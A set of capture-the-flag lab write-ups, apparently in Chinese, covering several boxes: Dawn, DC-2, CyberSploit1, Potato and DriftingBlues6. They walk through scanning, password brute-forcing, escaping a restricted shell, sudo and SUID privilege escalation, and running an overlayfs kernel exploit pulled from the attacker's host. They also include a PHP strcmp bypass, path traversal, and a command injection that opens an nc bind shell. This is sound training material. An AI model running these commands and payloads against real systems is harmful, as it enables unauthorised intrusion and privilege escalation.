connect to [192.168.45.214] from (UNKNOWN) [192.168.117.11] 54742 dawn@dawn:~$ id id uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner) dawn@dawn:~$ whoami whoami dawn dawn@dawn:~$ cd /root cd /root bash: cd: /root: Permission denied dawn@dawn:~$ sudo -l sudo -l Matching Defaults entries for dawn on dawn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User dawn may run the following commands on dawn: (root) NOPASSWD: /usr/bin/mysql dawn@dawn:~$ ``` > (root) NOPASSWD: /usr/bin/mysql #### 8. GTFO: mysql 查詢 [GTFO](https://gtfobins.github.io/gtfobins/mysql/) ``` dawn@dawn:~$ sudo mysql -e '\! /bin/sh' sudo mysql -e '\! /bin/sh' ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO) ``` > MySQL root 使用者需要密碼\ > (失敗) #### 9. SUID ``` dawn@dawn:~$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /usr/sbin/mount.cifs /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/bin/su /usr/bin/newgrp /usr/bin/pkexec /usr/bin/passwd /usr/bin/sudo /usr/bin/mount /usr/bin/zsh /usr/bin/gpasswd /usr/bin/chsh /usr/bin/fusermount /usr/bin/umount /usr/bin/chfn ``` #### 10. zsh ``` dawn@dawn:~$ /usr/bin/zsh /usr/bin/zsh dawn# whoami whoami root dawn# cd /root cd /root dawn# ls ls flag.txt proof.txt dawn# cat flag.txt cat flag.txt Your flag is in another file... dawn# cat proof.txt ``` ### ✅ Get Root FLAG # DC-2 ![image](https://hackmd.io/_uploads/BJtR7GOnkg.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 192.168.117.194 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 05:53 EDT Nmap scan report for 192.168.117.194 Host is up (0.13s latency). 
Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Did not follow redirect to http://dc-2/ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.30 seconds ``` > 只有一個 80 port ?! #### 1.2 /etc/hosts ``` ┌──(chw㉿CHW)-[~] └─$ cat /etc/hosts 192.168.117.194 dc-2 ``` #### 1.3 瀏覽 http 瀏覽 http://192.168.117.194\ ![image](https://github.com/user-attachments/assets/a7d276f5-6f48-45db-8eb7-eb55cf007c83) 點選 "Flag": http://dc-2/index.php/flag/\ ![image](https://hackmd.io/_uploads/B1bDx7O31l.png) > 提示使用 `cewl` ?! #### 1.4 WPScan ![image](https://hackmd.io/_uploads/SyCeZmu2Je.png) ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url http://dc-2/ --enumerate p --plugins-detection aggressive ... [+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2024-11-12T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 3.8 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2' ... [+] akismet | Location: http://dc-2/wp-content/plugins/akismet/ | Last Updated: 2025-02-14T18:49:00.000Z | Readme: http://dc-2/wp-content/plugins/akismet/readme.txt | [!] 
The version is out of date, the latest version is 5.3.7 | | Found By: Known Locations (Aggressive Detection) | - http://dc-2/wp-content/plugins/akismet/, status: 200 | | Version: 3.3.2 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://dc-2/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://dc-2/wp-content/plugins/akismet/readme.txt ``` > `twentyseventeen` 與 `akismet` out of date ### 2. searchsploit ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit twentyseventeen Exploits: No Results Shellcodes: No Results ┌──(chw㉿CHW)-[~] └─$ searchsploit aggressive --------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- IKE - Aggressive Mode Shared Secret Hash Leakage | hardware/remote/22532.txt --------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` > 沒有可以利用的資訊 ### 3. WPScan User ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url http://dc-2/ --enumerate u ... 
[i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) ``` 列出 username ``` ┌──(chw㉿CHW)-[~] └─$ cat username.txt admin jerry tom ``` ### 4. crewl cewl 根據網站產生字典檔 ``` ┌──(chw㉿CHW)-[~] └─$ cewl -w custom_wordlist.txt http://dc-2/ ┌──(chw㉿CHW)-[~] └─$ cat custom_wordlist.txt sit amet nec quis vel orci site ... ``` ### 5. wpscan 暴力破解 ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url http://dc-2/ -U username.txt -P custom_wordlist.txt --force ... [!] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient ``` > `jerry`:`adipiscing`\ > `tom`:`parturient` ### 6. 登入 Wordpress 在 Jerry 管理頁面中找到 /Flag2 Page ![image](https://hackmd.io/_uploads/BJnYAQ_3kl.png) > 找到 Flag 2 的提示,但還是沒有利用點\ > 決定 nmap 掃描全部 port ### - Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -p- 192.168.117.194 Nmap scan report for 192.168.117.194 Host is up (0.098s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 7744/tcp open raqmon-pdu ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -p 7744 192.168.117.194 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 23:42 EDT Nmap scan report for 192.168.117.194 Host is up (0.100s latency). 
PORT STATE SERVICE VERSION 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### 7. SSH 使用 tom 成功登入 ``` ┌──(chw㉿CHW)-[~] └─$ ssh tom@192.168.117.194 -p 7744 tom@192.168.117.194's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. tom@DC-2:~$ ls flag3.txt local.txt usr ``` ### ✅ Get User Flag > 在 `/home/tom`找到 User flag ## Privileges Escalation ### 8. 查看 flag3.txt ``` tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found tom@DC-2:~$ vi flag.txt poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. ``` ### 9. Vi 跳脫 restricted shell 先嘗試 Python 取得互動式 Shell ``` tom@DC-2:~$ echo $PATH /home/tom/usr/bin tom@DC-2:~$ export PATH=/bin:/usr/bin:$PATH -rbash: PATH: readonly variable tom@DC-2:~$ python -c 'import os; os.system("/bin/sh")' -rbash: python: command not found tom@DC-2:~$ python3 -c 'import os; os.system("/bin/sh")' -rbash: python3: command not found ``` > 還是不行 使用 vi 可以 escape restricted shell,再加入 `/bin` 路徑 ``` vi :set shell=/bin/sh :shell $ whoami /bin/sh: 1: whoami: not found $ bash -i /bin/sh: 2: bash: not found $ su jerry /bin/sh: 3: su: not found $ export PATH=/bin:/usr/bin:$PATH $ id uid=1001(tom) gid=1001(tom) groups=1001(tom) ``` ### 10. 使用 user jerry ``` $ su jerry Password: jerry@DC-2:/home/tom$ ls /home/jerry flag4.txt jerry@DC-2:/home/tom$ cat flag4.txt cat: flag4.txt: Permission denied ``` ### 11. 
Sudo -l ``` jerry@DC-2:~$ sudo -l Matching Defaults entries for jerry on DC-2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User jerry may run the following commands on DC-2: (root) NOPASSWD: /usr/bin/git ``` ### 12. [GTFO](https://gtfobins.github.io/gtfobins/git/#sudo): git ``` jerry@DC-2:~$ sudo git -p help config ... !/bin/sh # id uid=0(root) gid=0(root) groups=0(root) # ls /root final-flag.txt proof.txt ``` ### ✅ Get Root FLAG # CyberSploit1 ![image](https://hackmd.io/_uploads/H1PneOK3Jx.png) ## Soulution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV 192.168.111.92 Nmap scan report for 192.168.111.92 Host is up (0.17s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA) | 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA) |_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) |_http-title: Hello Pentester! |_http-server-header: Apache/2.2.22 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.74 seconds ``` #### 1.2 dirsearch ``` ┌──(chw㉿CHW)-[~] └─$ dirsearch -u http://192.168.111.92/ /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /home/chw/reports/http_192.168.111.92/__25-03-20_06-59-27.txt Target: http://192.168.111.92/ ... 
[07:00:11] 200 - 73B - /robots.txt ... ``` 查看 /robots.txt 內容 ``` ┌──(chw㉿CHW)-[~] └─$ curl http://192.168.111.92/robots.txt Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0= ``` (Base64 decode)\ `cybersploit{youtube.com/c/cybersploit}` ??! #### 1.3 Source code view-source:http://192.168.111.92/#\ ![image](https://hackmd.io/_uploads/HJAEO_YnJg.png) > comment 中透露 User: `itsskv` ### 2. SSH Login 用 `itsskv`:`cybersploit{youtube.com/c/cybersploit}` ``` ┌──(chw㉿CHW)-[~] └─$ ssh itsskv@192.168.111.92 The authenticity of host '192.168.111.92 (192.168.111.92)' can't be established. ECDSA key fingerprint is SHA256:19IzxsJJ/ZH00ix+vmS6+HQqDcXtk9k30aT3K643kSs. ... Your Hardware Enablement Stack (HWE) is supported until April 2017. itsskv@cybersploit-CTF:~$ whoami itsskv ``` > 成功登入 ### ✅ Get User Flag > 在 `/home/itsskv`找到 User flag ## Privileges Escalation ### 1. LinPEAS ``` ┌──(chw㉿CHW)-[/usr/share/peass/linpeas] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ``` itsskv@cybersploit-CTF:~$ wget http://192.168.45.193/linpeas.sh itsskv@cybersploit-CTF:~$ chmod +x linpeas.sh itsskv@cybersploit-CTF:~$ ./linpeas.sh ``` ### 2. searchsploit ``` itsskv@cybersploit-CTF:~$ uname -a Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux ``` (Kali) ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit Linux 3.13.0-32 ... inux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation | solaris/local/15962.c Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation | linux/local/41995.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | linux/local/37293.txt ... 
┌──(chw㉿CHW)-[~]
└─$ searchsploit -m 37292
  Exploit: Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/37292
     Path: /usr/share/exploitdb/exploits/linux/local/37292.c
    Codes: CVE-2015-1328
 Verified: True
File Type: C source, ASCII text, with very long lines (466)
Copied to: /home/chw/37292.c
```

### 3. exploit

```
itsskv@cybersploit-CTF:~$ wget http://192.168.45.193/37292.c
itsskv@cybersploit-CTF:~$ cat 37292.c
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*

CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT

user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
```

Follow the steps given in the exploit header:

```
itsskv@cybersploit-CTF:~$ gcc 37292.c -o ofs
itsskv@cybersploit-CTF:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(itsskv)
```

### ✅ Get Root FLAG

# Potato

![image](https://hackmd.io/_uploads/r1jASYF2yx.png)

## Solution

### 1. Recon

#### 1.1 Nmap

```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 192.168.111.101
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 08:11 EDT
Nmap scan report for 192.168.111.101
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA)
|   256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA)
|_  256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Potato company
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.64 seconds
```

#### 1.2 dirsearch

```
┌──(chw㉿CHW)-[~]
└─$ dirsearch -u http://192.168.111.101
...
[08:13:43] 301 -  318B  - /admin  ->  http://192.168.111.101/admin/
[08:13:44] 200 -  228B  - /admin/
[08:13:44] 200 -  228B  - /admin/index.php
[08:13:44] 200 -  489B  - /admin/logs/
...
```

- Browse `/admin/index.php`\
  ![image](https://hackmd.io/_uploads/r1NRDKKnkl.png)
- Browse `/admin/logs`\
  ![image](https://hackmd.io/_uploads/SyMxdtFnke.png)
- `/admin/logs/log_01.txt`
  ![image](https://hackmd.io/_uploads/HJec5ttnyx.png)
- `/admin/logs/log_02.txt`
  ![image](https://hackmd.io/_uploads/B14ocFK31x.png)
- `/admin/logs/log_03.txt`
  ![image](https://hackmd.io/_uploads/HkWp5tt2kl.png)

### 2. hydra

- HTTP Post

  ![image](https://hackmd.io/_uploads/S1t70tthyx.png)

  ```
  ┌──(chw㉿CHW)-[~]
  └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.111.101 http-post-form "/admin/index.php?login=1:username=admin&password=^PASS^:F=Bad user/password! "
  ```

- SSH

  ```
  ┌──(chw㉿CHW)-[~]
  └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.111.101
  ```

>[!Tip] This takes forever

### 3. Nmap -p-

```
┌──(chw㉿CHW)-[~]
└─$ sudo nmap -sS -p- 192.168.111.101
[sudo] password for chw:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 09:46 EDT
Nmap scan report for 192.168.111.101
Host is up (0.089s latency).
Not shown: 65521 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
2112/tcp open  kip

┌──(chw㉿CHW)-[~]
└─$ sudo nmap -sC -sV -p 2112 192.168.111.101
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 09:52 EDT
Nmap scan report for 192.168.111.101
Host is up (0.10s latency).

PORT     STATE SERVICE VERSION
2112/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
|_-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
```

> Anonymous FTP login allowed

### 4. ftp

Connect as `anonymous`:

```
┌──(chw㉿CHW)-[~]
└─$ ftp anonymous@192.168.111.101 2112
Connected to 192.168.111.101.
220 ProFTPD Server (Debian) [::ffff:192.168.111.101]
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.251.111 !
230-
230-The local time is: Thu Mar 20 13:55:30 2025
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||22207|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak
-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg
226 Transfer complete
ftp>
```

Retrieve `index.php.bak` and `welcome.msg` and inspect them:

```
ftp> get index.php.bak
local: index.php.bak remote: index.php.bak
229 Entering Extended Passive Mode (|||33583|)
150 Opening BINARY mode data connection for index.php.bak (901 bytes)
   901      226.01 KiB/s
226 Transfer complete
901 bytes received in 00:00 (9.81 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||48470|)
150 Opening BINARY mode data connection for welcome.msg (54 bytes)
    54      446.90 KiB/s
226 Transfer complete
54 bytes received in 00:00 (0.60 KiB/s)
```

- index.php.bak:
  ![image](https://hackmd.io/_uploads/Hy2NyjFhyg.png)
  > The PHP `strcmp` check can be bypassed
- welcome.msg:
  ![image](https://hackmd.io/_uploads/BydIkot2Jg.png)

### 5. Bypass PHP strcmp

https://rst.hashnode.dev/bypassing-php-strcmp\
Sending an empty array (`[]`) instead of a string bypasses the check: `strcmp()` given an array returns `NULL`, and `NULL == 0` is true under PHP's loose comparison.

```
username=admin&password[]=chw
```

![image](https://hackmd.io/_uploads/ryejlitnyg.png)

### 6. Admin Page

http://192.168.111.101/admin/dashboard.php\
![image](https://hackmd.io/_uploads/HJwmGiY3yg.png)

The Logs feature:\
![image](https://hackmd.io/_uploads/HJ0LGsFnJl.png)

Try path traversal: `file=../../../../../etc/passwd`\
![image](https://hackmd.io/_uploads/rkMgQjKnyl.png)

> `webadmin`:`$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/`
>> 1. Try cracking the hash with hashcat
>> 2. Command injection:
>>    - the reverse shell does not call back
>>    - use a bind shell instead
>>    `file=;nc -l -v -p 6666 -e /bin/sh`

### 7. bind shell

`file=;nc -l -v -p 6666 -e /bin/sh`

```
┌──(chw㉿CHW)-[~]
└─$ nc 192.168.111.101 6666
python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@serv:/var/www/html/admin$
```

### ✅ Get User Flag

> User flag found in `/home/webadmin`

## Privilege Escalation

First get a proper low-privilege user account.

### 8. Hashcat

```
┌──(chw㉿CHW)-[~]
└─$ hashcat -m 500 potato.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
...
$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:dragon
...
```

> `webadmin`:`dragon`

### 9. Sudo -l

```
┌──(chw㉿CHW)-[~]
└─$ ssh webadmin@192.168.111.101
webadmin@192.168.111.101's password:
webadmin@serv:~$ sudo -l
[sudo] password for webadmin:
Matching Defaults entries for webadmin on serv:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on serv:
    (ALL : ALL) /bin/nice /notes/*
webadmin@serv:~$ sudo nice /bin/sh
Sorry, user webadmin is not allowed to execute '/usr/bin/nice /bin/sh' as root on serv.
```

Run things through `/bin/nice`:

```
webadmin@serv:~$ /bin/nice /bin/bash
webadmin@serv:~$ id
uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin)
webadmin@serv:~$ ls /notes/
clear.sh  id.sh
webadmin@serv:~$ sudo /bin/nice /notes/id.sh
uid=0(root) gid=0(root) groups=0(root)
```

Goal: get `/bin/nice` to start a shell, which then runs as root. The sudo rule only checks that the argument matches `/notes/*`, and that wildcard also matches a path that climbs back out of `/notes/`:

```
webadmin@serv:~$ sudo /bin/nice /notes/../bin/bash
root@serv:/home/webadmin# id
uid=0(root) gid=0(root) groups=0(root)
root@serv:/home/webadmin# cd /root
root@serv:~# ls
proof.txt  root.txt  snap
```

### ✅ Get Root FLAG

# DriftingBlues6

![image](https://hackmd.io/_uploads/HycnGK52Jl.png)

## Solution

### 1. Recon

#### 1.1 Nmap

```
┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -T4 -p- 192.168.171.219
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-21 02:01 EDT
Nmap scan report for 192.168.171.219
Host is up (0.10s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)
| http-robots.txt: 1 disallowed entry
|_/textpattern/textpattern
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 333.47 seconds
```

#### 1.2 Dirb

```
┌──(chw㉿CHW)-[~]
└─$ dirb http://192.168.171.219/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

---- Scanning URL: http://192.168.171.219/ ----
+ http://192.168.171.219/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.171.219/db (CODE:200|SIZE:53656)
+ http://192.168.171.219/index (CODE:200|SIZE:750)
+ http://192.168.171.219/index.html (CODE:200|SIZE:750)
+ http://192.168.171.219/robots (CODE:200|SIZE:110)
+ http://192.168.171.219/robots.txt (CODE:200|SIZE:110)
+ http://192.168.171.219/server-status (CODE:403|SIZE:296)
==> DIRECTORY: http://192.168.171.219/textpattern/
+ http://192.168.171.219/textpattern/index.php (CODE:200|SIZE:12414)
+ http://192.168.171.219/textpattern/LICENSE (CODE:200|SIZE:15170)
+ http://192.168.171.219/textpattern/README (CODE:200|SIZE:6311)
==> DIRECTORY: http://192.168.171.219/textpattern/rpc/
==> DIRECTORY: http://192.168.171.219/textpattern/textpattern/
==> DIRECTORY: http://192.168.171.219/textpattern/themes/
```

- Browse `/robots.txt`:\
  ![image](https://hackmd.io/_uploads/rJApccc21x.png)
  > `dont forget to add .zip extension to your dir-brute ;)`

Rescan with the `.zip` extension:

```
┌──(chw㉿CHW)-[~]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.171.219/FUZZ.zip

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.171.219/FUZZ.zip
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 107ms]
#                       [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 107ms]
# Copyright 2007 James Fisher [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 112ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms]
#                       [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 113ms]
# on atleast 2 different hosts [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 1203ms]
#                       [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 2205ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 2206ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 3214ms]
#                       [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 4216ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 750, Words: 44, Lines: 76, Duration: 4226ms]
spammer                 [Status: 200, Size: 179, Words: 3, Lines: 2, Duration: 103ms]
:: Progress: [220560/220560] :: Job [1/1] :: 397 req/sec :: Duration: [0:09:57] :: Errors: 0 ::
```

> spammer.zip

- Browse `/textpattern/index.php`
  ![image](https://hackmd.io/_uploads/rJyXh5531x.png)
  > The PHP environment has no `date.timezone` configured
- Browse `/textpattern/textpattern/`
  ![image](https://hackmd.io/_uploads/r1iHn9c3Jl.png)
  > The Textpattern version is not disclosed here, so no exploit can be chosen yet\
  > The version is in `http://192.168.171.219/textpattern/README`\
  > >Textpattern CMS 4.8.3\
  > >![image](https://hackmd.io/_uploads/H1fwWs9nkg.png)
  >
  > Exploit 48943 requires a file upload
- Browse `/textpattern/textpattern/setup/index.php`
  ![image](https://hackmd.io/_uploads/HJSc25c3kg.png)
  > `/textpattern/textpattern/setup/index.php` leaks information:\
  > ![image](https://hackmd.io/_uploads/HJk0-jqnke.png)
### 2. wget zip

Summing up the recon above, start with the robots.txt hint:

```
┌──(chw㉿CHW)-[~]
└─$ wget http://192.168.171.219/spammer.zip

┌──(chw㉿CHW)-[~]
└─$ unzip spammer.zip
Archive:  spammer.zip
[spammer.zip] creds.txt password:
```

> Password required

### 3. fcrackzip

```
┌──(chw㉿CHW)-[~]
└─$ fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip
found file 'creds.txt', (size cp/uc     27/    15, flags 1, chk b003)


PASSWORD FOUND!!!!: pw == myspace4
```

> `spammer.zip`:`myspace4`

Extract `spammer.zip`:

```
┌──(chw㉿CHW)-[~]
└─$ unzip spammer.zip
Archive:  spammer.zip
[spammer.zip] creds.txt password:
 extracting: creds.txt

┌──(chw㉿CHW)-[~]
└─$ cat creds.txt
mayer:lionheart
```

Try these credentials on `/textpattern/textpattern/index.php`.

